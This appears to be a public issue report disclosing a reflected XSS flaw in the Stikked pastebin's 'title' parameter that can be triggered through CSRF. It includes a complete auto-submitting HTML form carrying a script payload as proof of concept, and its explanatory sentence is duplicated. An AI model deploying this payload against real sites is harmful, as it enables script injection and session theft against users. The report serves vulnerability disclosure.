Open omriman067 opened 2 years ago
When an unsuccessful paste is submitted the "title" parameter is returned without sanitization which can lead to an XSS. This could be exploited using CSRF. here is an example of a such CSRF payload:
<html> <body onload="document.createElement('form').submit.call(document.getElementById('myForm'))"> <form id="myForm" name="myForm" action="https://stikked-site-to-xss/" method="POST"> <input type=hidden name="title" id="val1" value='"/><script>alert(document.domain)</script>'/> <input type=hidden name="lang" id="val2" value="value2"/> <input type=hidden name="code" id="val3" value="value3"/> <input type=hidden name="submit" id="submit" value="Continue"/> </form> </body> </html>
When an unsuccessful paste is submitted the "title" parameter is returned without sanitization which can lead to an XSS. This could be exploited using CSRF. here is an example of a such CSRF payload: